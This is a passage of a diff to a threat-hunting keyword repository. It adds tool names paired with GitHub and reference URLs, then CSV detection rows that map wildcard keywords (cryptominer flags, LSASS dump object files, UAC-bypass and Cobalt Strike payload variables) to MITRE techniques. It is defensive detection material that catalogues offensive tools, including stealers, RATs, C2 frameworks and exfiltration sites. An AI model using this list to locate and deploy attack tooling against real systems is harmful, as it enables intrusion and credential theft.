+"ssh","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml"
+"sshame","https://github.com/HynekPetrak/sshame"
+"ssh-auditor","https://github.com/ncsa/ssh-auditor"
+"sshLooterC","https://github.com/mthbernardes/sshLooterC"
+"ssh-mitm","https://github.com/jtesta/ssh-mitm"
+"SSH-PuTTY-login-bruteforcer","https://github.com/InfosecMatter/SSH-PuTTY-login-bruteforcer"
+"sslip.io","https://github.com/cunnie/sslip.io"
+"sslstrip","https://github.com/moxie0/sslstrip"
+"SspiUacBypass","https://github.com/antonioCoco/SspiUacBypass"
+"SSRFmap","https://github.com/swisskyrepo/SSRFmap"
+"StackCrypt","https://github.com/TheD1rkMtr/StackCrypt"
+"StarFighters","https://github.com/Cn33liz/StarFighters"
+"Starkiller","https://github.com/BC-SECURITY/Starkiller"
+"statistically-likely-usernames","https://github.com/insidetrust/statistically-likely-usernames"
+"StayKit","https://github.com/0xthirteen/StayKit"
+"Sticky-Keys-Slayer","https://github.com/linuz/Sticky-Keys-Slayer"
+"Striker","https://github.com/s0md3v/Striker"
+"Striker","https://github.com/4g3nt47/Striker"
+"subbrute","https://github.com/TheRook/subbrute"
+"subfinder","https://github.com/subfinder/subfinder"
+"Sublist3r","https://github.com/aboul3la/Sublist3r"
+"Suborner","https://github.com/r4wd3r/Suborner"
+"sudo","N/A"
+"sudo","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md"
+"sudo_inject","https://github.com/nongiach/sudo_inject"
+"SUDO_KILLER","https://github.com/TH3xACE/SUDO_KILLER"
+"sudoers","N/A"
+"Sudomy","https://github.com/screetsec/Vegile"
+"Sudomy","https://github.com/screetsec/Sudomy"
+"sudoSnatch","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SudoSnatch"
+"SUID3NUM","https://github.com/Anon-Exploiter/SUID3NUM"
+"Supernova","https://github.com/nickvourd/Supernova"
+"supershell","https://github.com/tdragon6/Supershell"
+"Surf VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml"
+"sVPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml"
+"SwampThing","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing"
+"Synergy-httpx","https://github.com/t3l3machus/Synergy-httpx"
+"sysctl","https://github.com/bdamele/icmpsh"
+"SysJoker","https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/"
+"sysmonquiet","https://github.com/ScriptIdiot/SysmonQuiet"
+"systemctl","https://attack.mitre.org/techniques/T1562/001/"
+"SysWhispers3","https://github.com/klezVirus/SysWhispers3"
+"t14m4t","https://github.com/MS-WEB-BN/t14m4t"
+"TakeMyRDP","https://github.com/TheD1rkMtr/TakeMyRDP"
+"TakeMyRDP","https://github.com/nocerainfosec/TakeMyRDP2.0"
+"takeown","https://www.pavel.gr/blog/neutralising-amsi-system-wide-as-an-admin"
+"takeown","https://github.com/ice-wzl/wmiexec2"
+"targetedKerberoast","https://github.com/ShutdownRepo/targetedKerberoast"
+"tasklist","https://github.com/ice-wzl/wmiexec2"
+"tcpdump","http://www.tcpdump.org/"
+"tcpreplay","https://tcpreplay.appneta.com/"
+"teamsphisher","https://github.com/Octoberfest7/TeamsPhisher"
+"teamstracker","https://github.com/nyxgeek/teamstracker"
+"TelegramRAT","https://github.com/machine1337/TelegramRAT"
+"telnet","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md"
+"telnet","https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_apt_equationgroup_lnx.yml"
+"temp.sh","https://twitter.com/mthcht/status/1660953897622544384"
+"tempsend.com","https://twitter.com/mthcht/status/1660953897622544384"
+"tetanus","https://github.com/MythicAgents/tetanus"
+"textbin.net","textbin.net"
+"TGSThief","https://github.com/MzHmO/TGSThief"
+"thc-hydra","https://github.com/vanhauser-thc/thc-hydra"
+"the-backdoor-factory","https://github.com/secretsquirrel/the-backdoor-factory"
+"TheFatRat","https://github.com/Screetsec/TheFatRat"
+"theHarvester","https://github.com/laramies/theHarvester"
+"themebleed","https://github.com/gabe-k/themebleed"
+"ThisIsNotRat","https://github.com/RealBey/ThisIsNotRat"
+"thoth","https://github.com/r1cksec/thoth"
+"ThreadlessInject","https://github.com/CCob/ThreadlessInject"
+"ThreatCheck","https://github.com/rasta-mouse/ThreatCheck"
+"Thunder Proxy","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml"
+"ThunderDNS","https://github.com/fbkcs/ThunderDNS"
+"ThunderShell","https://github.com/Mr-Un1k0d3r/ThunderShell"
+"Timeroast","https://github.com/SecuraBV/Timeroast"
+"tir_blanc_holiseum","https://www.holiseum.com/services/auditer/tir-a-blanc-ransomware"
+"tmpfiles.org","N/A"
+"tmpwatch","https://linux.die.net/man/8/tmpwatch"
+"TokenTactics","https://github.com/rvrsh3ll/TokenTactics"
+"Tokenvator","https://github.com/0xbadjuju/Tokenvator"
+"Tool-PassView","https://www.nirsoft.net/password_recovery_tools.html"
+"Tool-X","https://github.com/rajkumardusad/Tool-X"
+"Tor","https://github.com/r0oth3x49/Tor"
+"torproject","torproject.org"
+"TorPylle","https://github.com/cea-sec/TorPylle"
+"touch","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_timestomp_touch.toml"
+"Touch VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml"
+"tplmap","https://github.com/epinna/tplmap"
+"trackerjacker","https://github.com/calebmadrigal/trackerjacker"
+"traitor","https://github.com/liamg/traitor"
+"transfer.sh","https://twitter.com/mthcht/status/1660953897622544384"
+"transfert-my-files.com","https://twitter.com/mthcht/status/1660953897622544384"
+"translate.goog","https://*-com.translate.goog/*"
+"Trellonet Trellonet","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml"
+"trevorc2","https://github.com/trustedsec/trevorc2"
+"TREVORspray","https://github.com/blacklanternsecurity/TREVORspray"
+"tricky.lnk","https://github.com/xillwillx/tricky.lnk"
+"truffleHog","https://github.com/dxa4481/truffleHog"
+"TunnelBear VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml"
+"Tunnello VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml"
+"Turbo VPN for PC","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml"
+"twittor","https://github.com/PaulSec/twittor"
+"UACME","https://github.com/hfiref0x/UACME"
+"udmp-parser","https://github.com/0vercl0k/udmp-parser"
+"UFONet","https://github.com/epsylon/ufonet"
+"Ultrareach VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml"
+"Unblock Websites","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml"
+"unDefender","https://github.com/APTortellini/unDefender"
+"undertheradar","https://github.com/g3tsyst3m/undertheradar"
+"UnhookingPatch","https://github.com/TheD1rkMtr/UnhookingPatch"
+"UniByAv","https://github.com/Mr-Un1k0d3r/UniByAv"
+"unicorn","https://github.com/trustedsec/unicorn"
+"UniversalDVC","https://github.com/earthquake/UniversalDVC"
+"Unlimited VPN & Proxy by ibVPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml"
+"UnquotedPath","https://github.com/matterpreter/OffensiveCSharp/tree/master/UnquotedPath"
+"unset","N/A"
+"unset","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/OMGLogger"
+"unshackle","https://github.com/Fadi002/unshackle"
+"unshadow","N/A"
+"updog","https://github.com/sc0tfree/updog"
+"Upnet","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml"
+"Urban Free VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml"
+"Urban Shield","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml"
+"usbmon","https://www.kernel.org/doc/Documentation/usb/usbmon.txt"
+"usbpcap","https://github.com/s-h-3-l-l/katoolin3"
+"UserEnum","https://github.com/sensepost/UserEnum" +"username-anarchy","https://github.com/urbanadventurer/username-anarchy" +"UsoDllLoader","https://github.com/itm4n/UsoDllLoader" +"utorrent","https[://]www[.]utorrent[.]com/intl/fr/" +"uVPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"V3n0M-Scanner","https://github.com/v3n0m-Scanner/V3n0M-Scanner" +"Vajra","https://github.com/TROUBLE-1/Vajra" +"vbad","https://github.com/Pepitoh/Vbad" +"VBA-RunPE","https://github.com/itm4n/VBA-RunPE" +"vcsmap","https://github.com/melvinsh/vcsmap" +"Veee","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"venom","https://github.com/r00t-3xp10it/venom" +"Villain","https://github.com/t3l3machus/Villain" +"viperc2","https://github.com/FunnyWolf/viperpython" +"viperc2","https://github.com/FunnyWolf/vipermsf" +"VirtualShield VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"VirusTotalC2","https://github.com/RATandC2/VirusTotalC2" +"vncpwdump","https://www.codebus.net/d-2v0u.html" +"vncviewer","N/A" +"VPN Free","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"VPN Master","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"VPN Professional","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"VPN PROXY 
MASTER","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"VPN Unlimited Free","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"VPN.AC","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"VPN-free.pro","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"VPNMatic","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"VPNPivot","https://github.com/0x36/VPNPivot" +"vRealizeLogInsightRCE","https://github.com/horizon3ai/vRealizeLogInsightRCE" +"vscode","https://twitter.com/code/status/1699869087071899669" +"vscode","https://badoption.eu/blog/2023/01/31/code_c2.html" +"vsftpd","https://github.com/dagwieers/vsftpd/" +"vssadmin","N/A" +"vssadmin","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF" +"Vulmap","https://github.com/vulmon/Vulmap" +"w3af","https://w3af.org/" +"Wachee VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"WAF-bypass-Cheat-Sheet","https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet" +"wafw00f","https://github.com/EnableSecurity/wafw00f" +"wapiti","https://github.com/wapiti-scanner/wapiti" +"warberry","https://github.com/secgroundzero/warberry" +"wbadmin","N/A" +"wce","https://www.kali.org/tools/wce/" +"WDExtract","https://github.com/hfiref0x/WDExtract/" +"weakpass","https://github.com/zzzteph/weakpass" 
+"webBrowserPassView","https://www.nirsoft.net/utils/web_browser_password.html"
+"WebDavC2","https://github.com/Arno0x/WebDavC2"
+"WebDeveloperSecurityChecklist","https://github.com/virajkulkarni14/WebDeveloperSecurityChecklist"
+"web-hacking-toolkit","https://github.com/signedsecurity/web-hacking-toolkit"
+"weevely","https://github.com/sunge/Weevely"
+"Weevely3","https://github.com/epinna/weevely3"
+"wePWNise","https://github.com/FSecureLABS/wePWNise"
+"WerTrigger","https://github.com/sailay1996/WerTrigger"
+"westwind","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml"
+"wetransfer","https://twitter.com/mthcht/status/1658853848323182597"
+"WeVPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml"
+"wevtutil","N/A"
+"wfuzz","https://github.com/xmendez/wfuzz"
+"WhatBreach","https://github.com/Ekultek/WhatBreach"
+"whatlicense","https://github.com/charlesnathansmith/whatlicense"
+"where","https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/"
+"WheresMyImplant","https://github.com/0xbadjuju/WheresMyImplant"
+"whiskeysamlandfriends","https://github.com/secureworks/whiskeysamlandfriends"
+"whoami","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.yaml"
+"Whoer VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml"
+"wifi-arsenal","https://github.com/0x90/wifi-arsenal"
+"wifibroot","https://github.com/hash3liZer/WiFiBroot"
+"wifi-bruteforcer-fsecurify","https://github.com/faizann24/wifi-bruteforcer-fsecurify"
+"wifi-bruteforcer-fsecurity","https://github.com/faizann24/wifi-bruteforcer-fsecurify"
+"wifigrabber","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/wifigrabber"
+"wifijammer","https://github.com/hash3liZer/wifijammer"
+"wifijammer","https://github.com/DanMcInerney/wifijammer"
+"wifiphisher","https://github.com/wifiphisher/wifiphisher"
+"WiFi-Pumpkin","https://github.com/P0cL4bs/WiFi-Pumpkin"
+"wifite2","https://github.com/derv82/wifite2"
+"win-brute-logon","https://github.com/DarkCoderSc/win-brute-logon"
+"windapsearch","https://github.com/ropnop/windapsearch"
+"WinDefenderKiller","https://github.com/S12cybersecurity/WinDefenderKiller"
+"WindfarmDynamite","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/WindfarmDynamite"
+"WindmillVPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml"
+"WindowsExploitationResources","https://github.com/FULLSHADE/WindowsExploitationResources"
+"Windows-Exploit-Suggester","https://github.com/AonCyberLabs/Windows-Exploit-Suggester"
+"windows-login-phish","https://github.com/CipherKill/windows-login-phish"
+"Windows-Post-Exploitation","https://github.com/emilyanncr/Windows-Post-Exploitation"
+"windows-privesc-check","https://github.com/pentestmonkey/windows-privesc-check"
+"Windows-Privilege-Escalation","https://github.com/frizb/Windows-Privilege-Escalation"
+"Windscribe","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml"
+"Winpayloads","https://github.com/nccgroup/Winpayloads"
+"WinPwn","https://github.com/S3cur3Th1sSh1t/WinPwn"
+"WinPwnage","https://github.com/rootm0s/WinPwnage"
+"winrs","N/A"
+"WinSCPPasswdExtractor","https://github.com/NeffIsBack/WinSCPPasswdExtractor"
+"WinShellcode","https://github.com/DallasFR/WinShellcode"
+"WINspect","https://github.com/A-mIn3/WINspect"
+"WirelessKeyView","https://www.nirsoft.net/utils/wireless_key.html"
+"wireshark","https://www.wireshark.org/"
+"wiresocks","https://github.com/sensepost/wiresocks"
+"WitnessMe","https://github.com/byt3bl33d3r/WitnessMe"
+"WLAN-Windows-Passwords","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords"
+"WMEye","https://github.com/pwn1sher/WMEye"
+"wmic","https://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/"
+"wmic","N/A"
+"wmic","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Anti-Forensics.md"
+"wmic","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF"
+"WMIcmd","https://github.com/nccgroup/WMIcmd"
+"wmiexec","https://github.com/WKL-Sec/wmiexec"
+"wmiexec","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127"
+"wmiexec2","https://github.com/ice-wzl/wmiexec2"
+"wmiexec-pro","https://github.com/XiaoliChan/wmiexec-Pro"
+"WMImplant","https://github.com/FortyNorthSecurity/WMImplant"
+"WMIPersistence","https://github.com/mdsecactivebreach/WMIPersistence"
+"Wmisploit","https://github.com/secabstraction/WmiSploit"
+"wordlists","https://www.kali.org/tools/wordlists/"
+"wordlists","https://github.com/clem9669/wordlists"
+"wordsmith","https://github.com/skahwah/wordsmith"
+"WorkingVPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml"
+"WorldWind-Stealer","https://github.com/Leecher21/WorldWind-Stealer"
+"wpaf","https://github.com/kancotdiq/wpaf"
+"WPScan","https://github.com/wpscanteam/wpscan"
+"WSPCoerce","https://github.com/slemire/WSPCoerce"
+"WSUSpendu","https://github.com/AlsidOfficial/WSUSpendu"
+"wsuxploit","https://github.com/pimps/wsuxploit"
+"xcopy","N/A"
+"Xerror","https://github.com/projectdiscovery/nuclei-burp-plugin"
+"Xerror","https://github.com/Chudry/Xerror"
+"xmrig","https://github.com/xmrig/xmrig/"
+"xrdp","https://github.com/neutrinolabs/xrdp"
+"xspy -display","https://github.com/mnp/xspy/blob/master/xspy.c"
+"xss-labs","https://github.com/paralax/xss-labs"
+"XSS-Payloads","http://www.xss-payloads.com/"
+"XSStrike","https://github.com/UltimateHackers/XSStrike"
+"xxd","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md"
+"XXEinjector","https://github.com/enjoiz/XXEinjector"
+"yodo","https://github.com/b3rito/yodo"
+"ysoserial.net","https://github.com/pwntester/ysoserial.net"
+"zarp","https://github.com/hatRiot/zarp"
+"ZenMate VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml"
+"zeroday-powershell","https://github.com/OneLogicalMyth/zeroday-powershell"
+"zerologon","https://github.com/michaelpoznecki/zerologon"
+"zerosum0x0","https://github.com/zerosum0x0"
+"Zloader","https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/"
+"Zloader","https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/"
diff --git a/threathunting-keywords.csv b/threathunting-keywords.csv
index 314c50330..fe7d17d2a 100644
--- a/threathunting-keywords.csv
+++ b/threathunting-keywords.csv
@@ -1,20051 +1,20281 @@ -keyword,metadata_keyword_type,metadata_tool,metadata_description,metadata_tool_techniques,metadata_tool_tactics,metadata_malwares_name,metadata_groups_name,metadata_category,metadata_link,metadata_enable_endpoint_detection,metadata_enable_proxy_detection,metadata_comment,metadata_severity_score,metadata_popularity_score,metadata_github_stars,metadata_github_forks,metadata_github_updated_at,metadata_github_created_at -* --coin=monero*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,0,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -* - Sensitive Accounts.csv*,offensive_tool_keyword,ACLight,A tool for advanced discovery of Privileged Accounts - including Shadow Admins.,T1087 - T1003 - T1208,TA0001 - TA0006 - TA0008,N/A,N/A,AD Enumeration,https://github.com/cyberark/ACLight,1,0,N/A,7,8,730,150,2019-09-09T06:48:45Z,2017-05-17T09:29:41Z -* - ShadowSpray*,offensive_tool_keyword,ShadowSpray,A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.,T1110.003 - T1098 - T1059 - T1075,TA0001 - TA0008 - TA0009,N/A,N/A,Discovery,https://github.com/ShorSec/ShadowSpray,1,0,N/A,7,5,408,72,2022-10-14T13:36:51Z,2022-10-10T08:34:07Z -* $exploit_oneliner*,offensive_tool_keyword,cobaltstrike,The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - 
T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/ElevateKit,1,0,N/A,10,10,812,205,2020-06-22T21:12:24Z,2016-12-08T03:51:09Z -* $FodHelperPath*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Invoke-FodHelperBypass.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* $lse_find_opts *,offensive_tool_keyword,linux-smart-enumeration,Linux enumeration tool for privilege escalation and discovery,T1087.004 - T1016 - T1548.001 - T1046,TA0007 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/diego-treitos/linux-smart-enumeration,1,0,N/A,9,10,2924,535,2023-09-17T10:27:49Z,2019-02-13T11:02:21Z -* $payload_oneliner *,offensive_tool_keyword,cobaltstrike,The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - 
T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/ElevateKit,1,0,N/A,10,10,812,205,2020-06-22T21:12:24Z,2016-12-08T03:51:09Z -* * 0x* - HOOK DETECTED*,offensive_tool_keyword,HookDetector,"Detects hooked Native API functions in the current process indicating the presence of EDR ",T1055.012 - T1082 - T1057,TA0007 - TA0003,N/A,N/A,Defense Evasion,https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector,1,0,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -* */lsass.o*,offensive_tool_keyword,cobaltstrike,Collection of CobaltStrike beacon object files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - 
TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/pwn1sher/CS-BOFs,1,0,N/A,10,10,100,23,2022-02-14T09:47:30Z,2021-01-18T08:54:48Z -* ./sf.py -l 127.0.0.1:5001*,offensive_tool_keyword,spiderfoot,The OSINT Platform for Security Assessments,T1595 - T1595.002 - T1596 - T1591 - T1591.002,TA0043 ,N/A,N/A,Information Gathering,https://www.spiderfoot.net/,1,0,N/A,6,10,N/A,N/A,N/A,N/A -* ./tor.keyring *,offensive_tool_keyword,torproject,Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.,T1090 - T1134 - T1188 - T1307 - T1497 - T1560,TA0001 - TA0002 - TA0005 - TA0011,N/A,N/A,Data Exfiltration,torproject.org,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* .\tor.keyring *,offensive_tool_keyword,torproject,Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. 
